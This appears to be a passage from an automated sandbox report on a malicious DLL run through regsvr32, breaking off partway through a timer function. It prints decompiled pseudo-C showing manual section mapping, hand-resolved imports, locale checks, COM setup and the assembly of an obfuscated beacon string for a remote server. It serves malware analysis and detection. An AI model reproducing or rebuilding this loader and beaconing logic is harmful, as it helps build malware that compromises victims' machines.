                                    0x6e2a2085
                                    0x6e2a2089
                                    0x6e2a20a7
                                    0x6e2a208b
                                    0x6e2a2092
                                    0x6e2a20a0
                                    0x6e2a20a0
                                    0x6e2a2089
                                    0x6e2a20b8

                                    APIs
                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74EC1222,00000000,00000000), ref: 6E2A2070
                                      • Part of subcall function 6E2A121F: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E2A124C
                                    • memset.NTDLL ref: 6E2A2092
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Section$CreateViewmemset
                                    • String ID: @
                                    • API String ID: 2533685722-2766056989
                                    • Opcode ID: 30335dec29f88378c7f926de13ada1ea94910b89b6dc03b9477e7fe4fe8ef42a
                                    • Instruction ID: 3ecbb327a7c671c733ac57ed1beb5a147581331d7576973ef6a1b0d44339370e
                                    • Opcode Fuzzy Hash: 30335dec29f88378c7f926de13ada1ea94910b89b6dc03b9477e7fe4fe8ef42a
                                    • Instruction Fuzzy Hash: DA211DB6D0020DAFDB11DFE9C8849DEFBBAEF58354F508429E615F7210D7719A488B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A105E, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E6E2A105E(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





                                    0x6e2a1062
                                    0x6e2a1073
                                    0x6e2a107b
                                    0x6e2a107d
                                    0x6e2a1090
                                    0x6e2a1090
                                    0x6e2a109a

                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6E2A178D,?,6E2A1A94,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A1073
                                    • GetSystemDefaultUILanguage.KERNEL32(?,?,6E2A178D,?,6E2A1A94,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A107D
                                    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E2A178D,?,6E2A1A94,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A1090
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Language$DefaultInfoLocaleNameSystem
                                    • String ID:
                                    • API String ID: 3724080410-0
                                    • Opcode ID: db74b109c87c19a99d2f440aabfcfd7b1127e2cbdbb99bebcd4f6915434044ce
                                    • Instruction ID: d3d4ad6bb298bf18cf0c274f94187eda5004a4bb19b3f9fce126bbbe3bca8ab5
                                    • Opcode Fuzzy Hash: db74b109c87c19a99d2f440aabfcfd7b1127e2cbdbb99bebcd4f6915434044ce
                                    • Instruction Fuzzy Hash: 31E04FA4644249B7EB00D7E58D0AFBDB2BDAB01B0AF500084FB11E60C0D7B49E04E735
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1552, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E6E2A1552(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e2a41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                    0x6e2a1552
                                    0x6e2a155b
                                    0x6e2a1560
                                    0x6e2a1566
                                    0x6e2a156f
                                    0x6e2a1575
                                    0x6e2a1577
                                    0x6e2a157a
                                    0x6e2a157f
                                    0x6e2a1586
                                    0x6e2a1586
                                    0x6e2a158a
                                    0x6e2a1592
                                    0x6e2a1595
                                    0x00000000
                                    0x00000000
                                    0x6e2a159b
                                    0x6e2a15a5
                                    0x6e2a15a7
                                    0x6e2a15aa
                                    0x6e2a15ad
                                    0x6e2a15b1
                                    0x6e2a15b9
                                    0x6e2a15bb
                                    0x6e2a15be
                                    0x6e2a1626
                                    0x6e2a1626
                                    0x6e2a162a
                                    0x00000000
                                    0x00000000
                                    0x6e2a15c3
                                    0x6e2a15c9
                                    0x6e2a15cb
                                    0x6e2a15de
                                    0x6e2a15e1
                                    0x6e2a15e1
                                    0x6e2a15e1
                                    0x6e2a15e5
                                    0x6e2a15cd
                                    0x6e2a15cd
                                    0x6e2a15d5
                                    0x6e2a15d7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a15d7
                                    0x6e2a15c5
                                    0x6e2a15c5
                                    0x6e2a15d9
                                    0x6e2a15d9
                                    0x6e2a15d9
                                    0x6e2a15e8
                                    0x6e2a15eb
                                    0x6e2a15ed
                                    0x6e2a15f4
                                    0x6e2a15ef
                                    0x6e2a15ef
                                    0x6e2a15ef
                                    0x6e2a15fc
                                    0x6e2a1602
                                    0x6e2a1604
                                    0x6e2a1634
                                    0x6e2a1606
                                    0x6e2a1606
                                    0x6e2a1609
                                    0x6e2a160b
                                    0x6e2a1613
                                    0x6e2a1613
                                    0x6e2a1618
                                    0x6e2a161a
                                    0x6e2a1621
                                    0x6e2a1623
                                    0x6e2a1623
                                    0x6e2a1623
                                    0x00000000
                                    0x6e2a1623
                                    0x00000000
                                    0x6e2a1604
                                    0x6e2a15b3
                                    0x6e2a15b5
                                    0x6e2a15b7
                                    0x00000000
                                    0x00000000
                                    0x6e2a15b7
                                    0x6e2a1637
                                    0x6e2a1637
                                    0x6e2a163e
                                    0x6e2a1643
                                    0x00000000
                                    0x00000000
                                    0x6e2a1649
                                    0x6e2a1654
                                    0x00000000
                                    0x6e2a1654
                                    0x6e2a164b
                                    0x6e2a164b
                                    0x6e2a1651
                                    0x00000000
                                    0x6e2a1651
                                    0x6e2a157f
                                    0x6e2a1655
                                    0x6e2a165a

                                    APIs
                                    • LoadLibraryA.KERNEL32 ref: 6E2A158A
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 6E2A15FC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 2574300362-0
                                    • Opcode ID: 074c329e8e715e9cc5145349dc06cee5b2db07e7c8e763f0ce4f9961886e1ec3
                                    • Instruction ID: 0fe7807370ec9f0791ad851b8946d4aafa8ee3ea4585429064ef307608e1e915
                                    • Opcode Fuzzy Hash: 074c329e8e715e9cc5145349dc06cee5b2db07e7c8e763f0ce4f9961886e1ec3
                                    • Instruction Fuzzy Hash: C33119B1A0020A9FDB54CF9DC894AADB7FAFF05721F144069DA15E7245E770DA88CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A4D62, Relevance: 3.1, APIs: 2, Instructions: 82comCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E001A4D62(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t39;
				void* _t46;

				_t22 =  *0x1aa2d4; // 0x314d7d0
				_t2 = _t22 + 0x1ab0dc; // 0x32f88ac
				_t3 = _t22 + 0x1ab0cc; // 0x4590f811
				_t39 = 0;
				_v12 = 0;
				_t24 =  *0x1aa140(_t3, 0, 1, _t2,  &_v16); // executed
				_t46 = _t24;
				if(_t46 >= 0) {
					if(_a8 != 0) {
						_t36 =  *0x1aa2d4; // 0x314d7d0
						_t8 = _t36 + 0x1ab3e4; // 0x5f005f
						E001A757B(_t8, _a8,  &_v12);
						_t39 = _v12;
					}
					_t26 = _v16;
					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
					if(_t46 >= 0) {
						_t32 =  *0x1aa150(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
						_t46 = _t32;
						_t33 = _v8;
						if(_t46 < 0) {
							 *((intOrPtr*)( *_t33 + 8))(_t33);
						} else {
							 *_a12 = _t33;
						}
					}
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
					_t28 = _v16;
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				return _t46;
			}















                                    0x001a4d6f
                                    0x001a4d74
                                    0x001a4d80
                                    0x001a4d86
                                    0x001a4d89
                                    0x001a4d8c
                                    0x001a4d92
                                    0x001a4d96
                                    0x001a4d9b
                                    0x001a4da1
                                    0x001a4da9
                                    0x001a4db0
                                    0x001a4db5
                                    0x001a4db5
                                    0x001a4db8
                                    0x001a4dce
                                    0x001a4dd2
                                    0x001a4de1
                                    0x001a4de7
                                    0x001a4deb
                                    0x001a4dee
                                    0x001a4dfa
                                    0x001a4df0
                                    0x001a4df3
                                    0x001a4df3
                                    0x001a4dee
                                    0x001a4dff
                                    0x001a4e04
                                    0x001a4e04
                                    0x001a4e07
                                    0x001a4e0d
                                    0x001a4e0d
                                    0x001a4e16

                                    APIs
                                    • CoCreateInstance.OLE32(4590F811,00000000,00000001,032F88AC,74EEBB27), ref: 001A4D8C
                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001A4DE1
                                      • Part of subcall function 001A757B: CoCreateInstance.OLE32(674B6698,00000000,00000001,032F88CC,?), ref: 001A75B4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CreateInstance$BlanketProxy
                                    • String ID:
                                    • API String ID: 3291578418-0
                                    • Opcode ID: abdc90ec0dc47799b7df778cc1e8ef816a679a2d96d9d90170674199dfc41f17
                                    • Instruction ID: cbba11266d2fd85c6d4ad0be512c6dceeebdaef5d784ecbd0be315b7fa0954d2
                                    • Opcode Fuzzy Hash: abdc90ec0dc47799b7df778cc1e8ef816a679a2d96d9d90170674199dfc41f17
                                    • Instruction Fuzzy Hash: 17217C79600218BFCB10DBA8CCC8D9EBBBDEF8A754F114495F506DB251C7719A45CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A121F, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E6E2A121F(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                    0x6e2a1231
                                    0x6e2a1237
                                    0x6e2a1245
                                    0x6e2a124c
                                    0x6e2a1251
                                    0x6e2a1257
                                    0x00000000
                                    0x6e2a1258
                                    0x00000000

                                    APIs
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E2A124C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: SectionView
                                    • String ID:
                                    • API String ID: 1323581903-0
                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                    • Instruction ID: 8569589e5b9309767c5e656b24a28060d632bc0665ff70dcbf8cf0feea508bea
                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                    • Instruction Fuzzy Hash: CBF012B590020CBFEB119FA9CC85C9FBBBEEB44364B104939F252E1090D6349E488A60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A7106, Relevance: 34.7, APIs: 23, Instructions: 220memorystringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 70%
                                    			E001A7106(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x1aa290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x1aa018; // 0xd0e4fb36
					asm("bswap eax");
					_t32 =  *0x1aa014; // 0xf7f8bd56
					asm("bswap eax");
					_t33 =  *0x1aa010; // 0xe67532f
					asm("bswap eax");
					_t34 =  *0x1aa00c; // 0x73a6f34e
					asm("bswap eax");
					_t35 =  *0x1aa2d4; // 0x314d7d0
					_t2 = _t35 + 0x1ab622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0x1aa02c,  *0x1aa004, _t110);
					_t38 = E001A4155();
					_t39 =  *0x1aa2d4; // 0x314d7d0
					_t3 = _t39 + 0x1ab662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x1aa2d4; // 0x314d7d0
						_t7 = _t92 + 0x1ab66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E001A35BC(_t99);
					_t44 =  *0x1aa2d4; // 0x314d7d0
					_t9 = _t44 + 0x1ab38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x1aa2d4; // 0x314d7d0
					_t11 = _t48 + 0x1ab33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x1aa32c; // 0x32f97d8
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x1aa2d4; // 0x314d7d0
						_t13 = _t88 + 0x1ab685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x1aa37c; // 0x32f9858
					_a28 = E001A49BA(0x1aa00a, _t105 + 4);
					_t55 =  *0x1aa31c; // 0x32f9808
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x1aa2d4; // 0x314d7d0
						_t16 = _t84 + 0x1ab8e9; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x1aa318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x1aa2d4; // 0x314d7d0
						_t18 = _t81 + 0x1ab8e2; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x1aa290, _t107, 0x800);
						if(_t98 != _t107) {
							E001A3D0C(GetTickCount());
							_t62 =  *0x1aa37c; // 0x32f9858
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x1aa37c; // 0x32f9858
							__imp__(_t66 + 0x40);
							_t68 =  *0x1aa37c; // 0x32f9858
							_t69 = E001A637D(1, _t103, _t117,  *_t68); // executed
							_t115 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x1a92ac);
								_push(_t115);
								_t108 = E001A7067();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E001A3735(0xffffffffffffffff, _t98, _v12, _v8); // executed
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E001A454A();
									}
									HeapFree( *0x1aa290, 0, _v24);
								}
								HeapFree( *0x1aa290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x1aa290, _t107, _t98);
						}
						HeapFree( *0x1aa290, _t107, _a20);
					}
					HeapFree( *0x1aa290, _t107, _t117);
				}
				return _v16;
			}






















































                                    0x001a7106
                                    0x001a711a
                                    0x001a711c
                                    0x001a712a
                                    0x001a712e
                                    0x001a7136
                                    0x001a713e
                                    0x001a713e
                                    0x001a7140
                                    0x001a714c
                                    0x001a715b
                                    0x001a7160
                                    0x001a7163
                                    0x001a7168
                                    0x001a716b
                                    0x001a7170
                                    0x001a7173
                                    0x001a717f
                                    0x001a718c
                                    0x001a718e
                                    0x001a7194
                                    0x001a7199
                                    0x001a71a4
                                    0x001a71a6
                                    0x001a71a9
                                    0x001a71af
                                    0x001a71b1
                                    0x001a71ba
                                    0x001a71c5
                                    0x001a71c7
                                    0x001a71ca
                                    0x001a71ca
                                    0x001a71cc
                                    0x001a71d3
                                    0x001a71d8
                                    0x001a71e5
                                    0x001a71e7
                                    0x001a71ec
                                    0x001a71fa
                                    0x001a71fc
                                    0x001a7201
                                    0x001a7206
                                    0x001a7209
                                    0x001a720e
                                    0x001a7219
                                    0x001a721b
                                    0x001a721e
                                    0x001a721e
                                    0x001a7220
                                    0x001a7233
                                    0x001a7237
                                    0x001a723c
                                    0x001a7240
                                    0x001a7243
                                    0x001a7248
                                    0x001a7253
                                    0x001a7255
                                    0x001a7258
                                    0x001a7258
                                    0x001a725a
                                    0x001a7261
                                    0x001a7264
                                    0x001a7269
                                    0x001a7273
                                    0x001a7275
                                    0x001a727c
                                    0x001a7294
                                    0x001a7298
                                    0x001a72a4
                                    0x001a72a9
                                    0x001a72b2
                                    0x001a72c3
                                    0x001a72c7
                                    0x001a72d0
                                    0x001a72d6
                                    0x001a72de
                                    0x001a72e3
                                    0x001a72f0
                                    0x001a72f6
                                    0x001a72fe
                                    0x001a7304
                                    0x001a730a
                                    0x001a730e
                                    0x001a7312
                                    0x001a7318
                                    0x001a731c
                                    0x001a7323
                                    0x001a732a
                                    0x001a732e
                                    0x001a7339
                                    0x001a7340
                                    0x001a7344
                                    0x001a734d
                                    0x001a734d
                                    0x001a735e
                                    0x001a735e
                                    0x001a736d
                                    0x001a7373
                                    0x001a7373
                                    0x001a737d
                                    0x001a737d
                                    0x001a738e
                                    0x001a738e
                                    0x001a739c
                                    0x001a739c
                                    0x001a73ac

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 001A7124
                                    • GetTickCount.KERNEL32 ref: 001A7138
                                    • wsprintfA.USER32 ref: 001A7187
                                    • wsprintfA.USER32 ref: 001A71A4
                                    • wsprintfA.USER32 ref: 001A71C5
                                    • wsprintfA.USER32 ref: 001A71E3
                                    • wsprintfA.USER32 ref: 001A71F8
                                    • wsprintfA.USER32 ref: 001A7219
                                    • wsprintfA.USER32 ref: 001A7253
                                    • wsprintfA.USER32 ref: 001A7273
                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001A728E
                                    • GetTickCount.KERNEL32 ref: 001A729E
                                    • RtlEnterCriticalSection.NTDLL(032F9818), ref: 001A72B2
                                    • RtlLeaveCriticalSection.NTDLL(032F9818), ref: 001A72D0
                                      • Part of subcall function 001A637D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63A8
                                      • Part of subcall function 001A637D: lstrlen.KERNEL32(00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63B0
                                      • Part of subcall function 001A637D: strcpy.NTDLL ref: 001A63C7
                                      • Part of subcall function 001A637D: lstrcat.KERNEL32(00000000,00000000), ref: 001A63D2
                                      • Part of subcall function 001A637D: StrTrimA.SHLWAPI(00000000,=), ref: 001A63EF
                                    • StrTrimA.SHLWAPI(00000000,001A92AC), ref: 001A72FE
                                      • Part of subcall function 001A7067: lstrlen.KERNEL32(032F8AA2,00000000,00000000,00000000,001A730A,00000000), ref: 001A7077
                                      • Part of subcall function 001A7067: lstrlen.KERNEL32(?), ref: 001A707F
                                      • Part of subcall function 001A7067: lstrcpy.KERNEL32(00000000,032F8AA2), ref: 001A7093
                                      • Part of subcall function 001A7067: lstrcat.KERNEL32(00000000,?), ref: 001A709E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 001A731C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A732A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A732E
                                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 001A735E
                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001A736D
                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001A737D
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A738E
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A739C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                    • String ID:
                                    • API String ID: 1837416118-0
                                    • Opcode ID: d4823b05327776c0654943371480d410d4859e9bc136116261634d23e68e0bd6
                                    • Instruction ID: 00b73ca97aff2ca00c970c71801a7d51dab2dc961469cf90c4e21e957a586b45
                                    • Opcode Fuzzy Hash: d4823b05327776c0654943371480d410d4859e9bc136116261634d23e68e0bd6
                                    • Instruction Fuzzy Hash: 34719171504204AFC722DB68ED88E977BECFF8B340B150415F909C3661E73AE995DB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A6D30, Relevance: 16.6, APIs: 11, Instructions: 149timememoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 83%
                                    			E001A6D30(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
